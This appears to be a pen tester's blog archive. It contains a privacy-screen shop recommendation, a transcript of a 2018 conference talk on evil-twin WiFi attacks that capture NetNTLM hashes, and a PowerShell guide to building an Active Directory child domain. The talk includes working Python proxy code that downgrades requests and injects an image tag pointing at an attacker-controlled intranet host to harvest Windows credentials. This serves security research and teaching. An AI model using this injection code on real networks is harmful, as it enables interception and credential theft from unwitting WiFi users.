Author Archives: Felix

Custom adhesive-backed laser cut privacy screens for laptops

Years ago I bought privacy screens for the computers of the company I was working for at the time. The reasons I really hated them were:

  • I couldn’t stand the dirt and grime that constantly collected behind them
  • the unsightly attachment mechanisms, and the fact that they kept falling off my laptop every time I closed the screen.

Eventually, I found a company that was willing to make a custom order for privacy screens and better still, they were self-adhesive which meant they couldn’t fall off, there were no ugly attachments, and they couldn’t get dirt stuck behind them.

I tried to find these guys again recently and really struggled – I kept finding garden screens and other random products on Amazon. After searching for a while I found the company again, and now they even have an online shop. So I don’t lose the link again, here they are: Protectionfilms24

The procedure to find the privacy screen for your computer, laptop or any other device is simple and user friendly if it is a standard size. When you enter the website you will see a blue device-selector box.

When you press the arrow a list of device types will appear. Choose the type of device you want to add the privacy screen to.

Screenshot from protectionfilms24.com: selecting a privacy screen for a device

The next step is to choose the brand of your device.

Screenshot from protectionfilms24.com: selecting a privacy screen for the right brand

They have more than 250,000 products, so we can’t show the whole list. But they have privacy screens for all manner of devices, even for cars.

When you choose the right brand for your device, Protectionfilms24 will provide a list of devices from that brand.

Screenshot from protectionfilms24.com: choosing the right device from a specific brand

After these three steps a list of results matching the parameters you entered will appear.

Privacy screens help protect against visual hacking (shoulder surfing), so if you work in public spaces it is a good idea to use one.

Conference Talk London 2018 | How to attack computers at cafes

Earlier this year, I was honoured to speak at the Security B-Sides London 2018 conference on the Rookie track. I presented the research I completed for my Master’s degree on the use of unencrypted WiFi networks by business users. They recorded all the sessions and the talk is now available on YouTube.

My work builds on top of known attacks and existing software. It attempts to establish whether or not it is possible to extract NetNTLM hashes from computers connected to unencrypted WiFi networks.

If you want the full presentation document click on the link: Slide Deck “How to: Actually attack computers at cafes”

If you want to test your company’s cyber security, contact us and we will help you with your cybersecurity needs.

Transcript of my presentation | How to attack computers at cafes

This transcript has been tidied up a bit from the original speech because it doesn’t read brilliantly, but the message is the same.

Who am I?

Hi Everyone, I’m Felix and I’m a pen tester. I’ve been doing this for a while now and breaking into stuff for longer.

Why this research?

Today I am here to talk to you about some work that I did for my Master’s dissertation. I was told to go away, find a project and do some research. At the same time I had a client that basically refused to take my word for it. They told me that they had lots of staff who spent a lot of time in airports and hotels and used free WiFi without a VPN or other protection. Essentially they had all their traffic going across the Internet without extra protection, and this worried me.

The client turned round to me when I was telling him about the problem and stopped me saying “Can you prove it? Can you show me this? Because if you can’t I’m probably not going to do anything about it.” I had a look around but I couldn’t find a tool where the output would be something the business would care about. So I started out writing one myself.

Open WiFi MitM Condition

The work I am about to show you is based on a Man-in-the-Middle (MitM) attack. As a recap for those who may or may not know it: MitM conditions are essentially where you have some attacker controlled infrastructure where the attacker can do something to the communication between legitimate users and servers.

What can you do with MitM conditions?

These include reading the communication, modifying the communication and blocking the communication.

What I set out to do

I decided I was going to make my own Wi-Fi access point and make it steal user creds by being a MitM. I was hoping to then turn round to my client and give that demonstration so they would do something about their issue. At the time, I thought it would be easy, you know, why would it be hard, it’s open WiFi right?

Turns out encryption is a thing…

It turns out encryption is a thing… Obviously I already knew this, but it can be done at lots of different places in a communication. These days there’s not that much in terms of plaintext creds going around the world. It’s usually encrypted somewhere, and so that proved very quickly to me that I needed to do something a bit different.

The idea

The idea was to go from a normal transaction to a little bit more like this diagram. I already had a bit of a plan based on some other work that I’ve seen and I know is quite prevalent. Essentially the attacker does stuff down at the bottom of this diagram. The section in pink is the bit where the attacker can take action.

What I actually did

I took a WiFi Pineapple and I set up a wireless network. I thought I was pretty obvious with the name that I used – “DANGER ZONE – DO NOT USE” – so that no one would connect to it. But people did anyway. I had a 4G modem, my WiFi Pineapple, and a battery. I wanted to prove to my clients that it was portable and you could do the attack anywhere.

Developed a tool

I took someone else’s code, frankly because it was easy and it already worked, and then I added stuff to it. My development process, over quite a long time, was where I would build a bit and it would work a bit and then I would find a bug. This quickly made me want to tear my hair out. I’d regularly leave the project and come back to it later – the hallmark of a good software development lifecycle obviously…

Fundamentally the tool is a transparent HTTP proxy which is sat on top of the SMB capture stack from Responder. Importantly, the proxy injects an HTML image tag. Because I knew I couldn’t get plaintext creds I aimed at getting a NetNTLM hash instead for later cracking. I called the tool ETAC: Evil Twin Authentication Capture.

Windows auth

One of the things you can do with Windows Auth is use programs like Internet Explorer to perform authentication. I was convinced that it was really important for me to make sure that my research worked against as stock a Windows as possible. I’ve seen lots of presentations of a similar nature that require the Operating System to be tweaked and the security weakened. I wanted this demonstration to be as real as possible so I didn’t install anything, no Firefox or anything along those lines. The only change I made, which you will see in a bit is I added them to an Active Directory domain.

Windows auth – the dot rule

So to clarify, I am trying to get Internet Explorer to authenticate against something. In the default configuration the security settings restrict this automatic logon to the Local intranet zone. If the machine thinks a site is on its intranet it will do what I need it to. The intranet is defined by the settings in Internet Explorer. By default this means anything you explicitly list as part of the intranet, any sites that bypass a configured proxy server, and network paths accessed via UNC. The part that matters for this attack is better understood as “the dot rule”: a hostname with no dots in it is treated as a local intranet site, which means you can’t do it against IP addresses or Fully Qualified Domain Names (FQDNs), because both IPs and FQDNs have dots in them. All this meant the attack needed a DNS server that would answer for a single-label name.

The final attack flow

The diagram is what my attack flow ended up looking like:

  • The victim joins the evil twin wireless network and asks for a DHCP lease
  • The DHCP lease is supplied by the attacker’s DHCP server
  • Then an HTTP request goes through the evil web proxy
  • The web proxy downgrades the request as much as possible to enable easy injection into the response. This includes removing or altering HTTP headers and so on, but not things like SSL stripping.
  • The HTTP response then gets an image tag injected into it
  • Which then creates a DNS resolution request
  • And then the SMB stack from Responder kicks in and helpfully provides authentication capabilities

The challenges / HTTP is a pain

That all sounds like it should be amazing and work nicely and it kinda works… I had lots of problems:

  • First of all HTTP is a pain; there are a lot of variants in it.
  • The WiFi Pineapple doesn’t have a lot of power so I couldn’t just use other people’s libraries. This meant that I had to write a lot of this myself.
  • I found that there were status codes coming up with problems that I had no idea about and had not seen before, like an HTTP 416 error. This is “Range Not Satisfiable” – what on Earth does that mean?
  • Lots of HTTP headers were causing me problems.
  • Normal error handling was also tricky because sometimes connections are just not completed properly.
  • I discovered that there are behavioural differences between the use of transparent proxies and declared proxies. One of the things that is different is that transparent proxies don’t get explicitly told what port to actually go and make the request on. This is because it’s part of the original TCP connection. If you are doing iptables manipulations you lose some of that information. It’s often easy to guess but that isn’t great and it still needs coding up.

Transaction size and chunking

My favourite challenge was HTTP chunking and the differences between HTTP 1.0 and 1.1. Although they are a bit interchangeable, one of the biggest headaches I had was dealing with Chunked Transfer Encoding (CTE). In CTE you get a chunk of information and then the next chunk and so on. This is fine, but there seem to be two different types of CTE: marked and unmarked.

When you think about it, I am trying to inject an HTML tag, so I had to be quite careful with where that tag goes. Otherwise you end up with half of the injected tag in one chunk and half in the next chunk. Alternatively, you can save the whole response in the transparent proxy, manipulate it and then spit it out at the end. But this introduces delays which might make users suspicious of the gateway.
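To make the injection and chunking problem concrete, here is an added example of the two proxy steps described above (the request downgrade and the response injection). It is not code from ETAC or Responder; the single-label hostname “etac” in the image tag is hypothetical, chosen only because a dotless name stays in IE’s Local intranet zone under the dot rule. It takes the buffer-the-whole-response route, so the tag can never straddle a chunk boundary, and re-chunks or re-counts the body afterwards. The sample request and responses at the bottom are constructed for the example, not real captures.

```python
"""Added example (not code from ETAC or Responder): the request-downgrade and
response-injection steps of a transparent HTTP proxy, for both Content-Length
and chunked bodies.  The hostname "etac" in the tag is hypothetical."""

# Single-label name: no dot, so IE keeps it in the Local intranet zone (the
# "dot rule") and will answer the resulting auth challenge.  Placeholder name.
INJECT_TAG = b'<img src="http://etac/auth.png" width="1" height="1">'

# Request headers the proxy strips so the reply comes back plain and whole:
# Accept-Encoding (no gzip), Range/If-Range (no 206 or 416), If-* (no bodiless 304).
DOWNGRADE_REQUEST_HEADERS = {b"accept-encoding", b"range", b"if-range",
                             b"if-none-match", b"if-modified-since"}


def split_headers(raw: bytes):
    """Return (start_line, [header lines], body) for a raw HTTP message."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    return lines[0], lines[1:], body


def header_name(line: bytes) -> bytes:
    return line.partition(b":")[0].strip().lower()


def downgrade_request(raw: bytes) -> bytes:
    """Drop the headers that would make the origin compress, range or 304 the reply."""
    start, hdrs, body = split_headers(raw)
    kept = [h for h in hdrs if header_name(h) not in DOWNGRADE_REQUEST_HEADERS]
    return b"\r\n".join([start] + kept) + b"\r\n\r\n" + body


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a chunked body; chunk extensions and trailers are discarded."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2               # skip the chunk data and its trailing CRLF


def encode_chunked(body: bytes, chunk_size: int = 4096) -> bytes:
    """Re-chunk a body after modification, terminated by the zero-length chunk."""
    out = bytearray()
    for i in range(0, len(body), chunk_size):
        piece = body[i:i + chunk_size]
        out += b"%x\r\n%s\r\n" % (len(piece), piece)
    return bytes(out + b"0\r\n\r\n")


def inject_tag(html: bytes, tag: bytes = INJECT_TAG) -> bytes:
    """Place the tag just before </body>, or append it if there is none."""
    idx = html.lower().rfind(b"</body>")
    return html + tag if idx < 0 else html[:idx] + tag + html[idx:]


def inject_response(raw: bytes, tag: bytes = INJECT_TAG) -> bytes:
    """Inject into an HTML response, re-chunking or re-counting the body.
    Buffering the whole body avoids splitting the tag across chunks at the
    cost of the latency the talk mentions."""
    start, hdrs, body = split_headers(raw)
    values = {header_name(h): h.partition(b":")[2].strip().lower() for h in hdrs}
    if not values.get(b"content-type", b"").startswith(b"text/html"):
        return raw                    # only HTML can carry the tag
    if values.get(b"content-encoding", b"identity") != b"identity":
        return raw                    # compressed body: upstream downgrade was bypassed
    chunked = b"chunked" in values.get(b"transfer-encoding", b"")
    html = decode_chunked(body) if chunked else body
    new_html = inject_tag(html, tag)
    kept = [h for h in hdrs if header_name(h) != b"content-length"]
    if chunked:
        new_body = encode_chunked(new_html)
    else:
        kept.append(b"Content-Length: %d" % len(new_html))
        new_body = new_html
    return b"\r\n".join([start] + kept) + b"\r\n\r\n" + new_body


# Constructed sample messages (not real captures).  The chunked one splits
# "</body>" across two chunks, which is exactly where naive injection breaks.
SAMPLE_REQUEST = (b"GET / HTTP/1.1\r\nHost: example.com\r\n"
                  b"Accept-Encoding: gzip, deflate\r\nRange: bytes=0-99\r\n\r\n")
SAMPLE_HTML = b"<html><body>Hello</body></html>"
SAMPLE_PLAIN = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                b"Content-Length: 31\r\n\r\n" + SAMPLE_HTML)
SAMPLE_CHUNKED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                  b"Transfer-Encoding: chunked\r\n\r\n"
                  b"14\r\n<html><body>Hello</b\r\nb\r\nody></html>\r\n0\r\n\r\n")

if __name__ == "__main__":
    print(downgrade_request(SAMPLE_REQUEST).decode())
    print(inject_response(SAMPLE_PLAIN).decode())
    print(inject_response(SAMPLE_CHUNKED).decode())
```

Two practical notes. A real proxy needs the same care on the way in: the request must be rewritten before it reaches the origin, otherwise the reply comes back gzipped or as a 206/304 with no HTML to inject into, which is why the example strips those headers and then refuses to touch a response that still arrives compressed. And on the port question raised above, a transparent proxy sitting behind an iptables REDIRECT rule can recover the original destination address and port from the accepted socket with the SO_ORIGINAL_DST socket option rather than guessing.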

Successes and failures

The success I had was the fact that a standalone Windows 7 machine gave me NetNTLM creds no problem whatsoever; every single time it was happy. Unfortunately, the moment I joined the machine to an Active Directory domain, things started going a bit pear-shaped. What happens is that the SMB connection starts and almost straight away the targeted machine tries to work out where its Kerberos KDC is. It performs DNS resolution for the FQDN of the Active Directory domain that it knows about. When it doesn’t get a response, or gets a “no such name” response, it literally just sends an RST packet ending the connection to my attacking infrastructure. Game over…

There are lots of ways I think I could develop this further. I ran out of time for my Master’s thesis so I had to submit and it was fine. I think you might well be able to develop it to impersonate the KDC. Perhaps, depending on what it is looking for to prove that it is within the correct network it might be possible to trick it and get the authentication desired.

Summary

The tool is on GitHub, I definitely could develop it further. Machines joined to a domain are not vulnerable to this attack (yet), but those that are not domain joined are vulnerable.

Thank you very much, are there any questions?

Creating a new child domain – Microsoft Windows 2016 Server

Well, that was several hours of my life I won’t get back. Creating a new child domain is not an easy task, but we like challenges. This article will save you many hours of working out how to create one.

TL;DR

– Microsoft error messages still suck in Windows Server 2016
– Add the member server that will become the child-domain domain-controller to the parent domain before promoting it to a DC.

I was recently on a non-standard job. My client was interested in having a brand new Active Directory domain built to the best possible standards of information / “cyber” security.

I haven’t done much blue-team work for a little while, but I am always up for a challenge and this felt like a good opportunity to get my head around some of the challenges of setting up Windows 2016.

First of all, a side note: I hate Windows 2016 Core (aka non-GUI), I’m going to leave that there.

Moving on…

For reasons that are not best described here, my client wants a siloed Active Directory domain architecture.

Essentially, the ability to have different parts of the wider business belong to different container shells, whilst still having overarching control over the whole lot. This means a parent domain (the forest root, for those who think in *nix terms); this parent domain sits at the top of the Active Directory forest hierarchy.

Each child domain then inherits “stuff” (technical term) from the parent domain and can set its own controls. As a red-teamer, one goal in this scenario would be to become a member of Enterprise Admins, as this is the group that by default is truly in charge of the whole forest.

Long story short, I battled for hours trying to work out how to get this Windows 2016 vanilla-build server to become a domain controller for a child domain within the forest. No joy.

I kept getting a message “auth problem XXX”. Some research indicates that authentication has nothing to do with the problem, and in fact DNS is the problem.

Go Microsoft with the useful error messages!

Having spent loads of time on the DNS configuration I got nowhere. I tried everything from the obvious pointing the child at the parent for DNS. Manually making DNS zones on the parent and child, and everything in between.

Literally hours of different combinations and I was still not getting anywhere.

I wish I could claim that this was my idea. However, in a state of despair, I called a friend and explained the situation.

His response was:

“Well you have tried everything I would have thought of and I’ll be honest, I’ve never done it before so I am not sure….”

He trailed off and as I was responding he suddenly interrupted me, saying:

“have you joined the server that will become the child domain controller to the parent domain and then tried promoting it?”

The answer was no.

At first glance, this doesn’t make much sense as you are trying to add the machine to a sub-domain.

However, when you think a little deeper it does make sense.

The child would then appear in DNS correctly on the parent DNS service. Then they would have a basic trust relationship in place already making authentication “easier”.

So the very short version: to create a new child-domain domain controller, join the member server that will be promoted to the parent domain first.
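For anyone who wants the sequence as commands rather than a story, this is an added example of the order the post arrives at, written for this page and not taken from the author’s build notes. The forest root name “corp.example”, the child name “lab”, the interface alias and the parent DC address are placeholders. The DNS check in step 1 is the thing to run first when the promotion wizard reports an authentication problem, because that is where the real failure usually is.

```powershell
# Added example (not the author's build notes): promoting a member server to the
# first domain controller of a new child domain, joining the PARENT domain first.
# Placeholders: forest root "corp.example", child "lab", parent DC at 10.0.0.10.
$Parent = 'corp.example'
$Child  = 'lab'
$Cred   = Get-Credential -Message "Enterprise Admins account in $Parent"

# 1. Point the DNS client at a parent-domain DC, then prove the parent's DC locator
#    record resolves. If this throws, fix DNS before touching the wizard again.
Set-DnsClientServerAddress -InterfaceAlias 'Ethernet' -ServerAddresses '10.0.0.10'
Resolve-DnsName -Name "_ldap._tcp.dc._msdcs.$Parent" -Type SRV -ErrorAction Stop

# 2. Join the PARENT domain as an ordinary member server and reboot.
#    This registers the host in the parent's DNS and gives it a trust to build on.
Add-Computer -DomainName $Parent -Credential $Cred -Restart

# 3. After the reboot (new session, logged on with the parent credential):
#    install the role and promote the server into a brand-new child domain.
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSDomain `
    -DomainType ChildDomain `
    -ParentDomainName $Parent `
    -NewDomainName $Child `
    -NewDomainNetbiosName $Child.ToUpper() `
    -Credential $Cred `
    -InstallDns `
    -CreateDnsDelegation `
    -SafeModeAdministratorPassword (Read-Host -AsSecureString 'DSRM password') `
    -Force

# 4. From a parent-domain DC afterwards: confirm the delegation NS record and the
#    automatic parent-child trust both exist.
Get-DnsServerResourceRecord -ZoneName $Parent -RRType NS -Name $Child
Get-ADTrust -Filter "Name -eq '$Child.$Parent'"
```

Steps 1 and 2 run on the future child DC before the reboot, step 3 on the same box after it, and step 4 on a parent DC. The `-CreateDnsDelegation` switch is what makes the child’s zone reachable from the parent side without hand-built zones, which is the part that cost the hours above.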

Want to upgrade your cybersecurity?

Contact us and we will help you improve it.